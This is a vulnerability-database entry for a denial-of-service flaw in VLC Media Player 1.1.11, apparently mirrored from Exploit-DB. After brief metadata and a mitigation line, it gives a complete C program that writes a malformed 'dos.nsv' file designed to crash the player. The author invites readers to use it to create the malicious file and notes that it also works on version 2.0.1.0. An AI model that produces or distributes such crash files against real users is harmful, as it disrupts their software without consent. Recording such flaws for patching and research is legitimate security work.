VLC Media Player Denial-of-Service Vulnerability

vendor:

VLC Media Player

by:

Dan Fosco

7.5

CVSS

HIGH

Denial-of-Service

400

CWE

Product Name: VLC Media Player

Affected Version From: 1.1.11

Affected Version To: 1.1.11

Patch Exists: NO

Related CWE:

CPE: a:videolan:vlc_media_player:1.1.11

Metasploit:

Other Scripts:

Platforms Tested: Windows XP SP3 (64-bit)

2012

VLC Media Player Denial-of-Service Vulnerability

The vulnerability allows attackers to crash the VLC Media Player application, causing a denial of service for legitimate users.

Mitigation:

Update VLC Media Player to a version that is not affected by this vulnerability.

Source

Exploit-DB raw data:

// source: https://www.securityfocus.com/bid/64623/info

VLC Media Player is prone to a denial-of-service vulnerability.

Successful exploits may allow attackers to crash the affected application, denying service to legitimate users.

VLC Media Player 1.1.11 is vulnerable; other versions may also be affected. 

# Exploit Title: VLC v. 1.1.11 .nsv DOS
# Date: 3/14/2012
# Author: Dan Fosco
# Vendor or Software Link: www.videolan.org
# Version: 1.1.11
# Category: local
# Google dork: n/a
# Tested on: Windows XP SP3 (64-bit)
# Demo site: n/a

#include <stdio.h>

int main()
{
	FILE *f;
	f = fopen("dos.nsv", "w");
	fputs("\x4e\x53\x56\x66", f);
	fputc('\x00', f);
	fputc('\x00', f);
	fputc('\x00', f);
	fputc('\x00', f);
	fclose(f);
	return 0;
}

//use code for creating malicious file

edit:  works on 2.0.1.0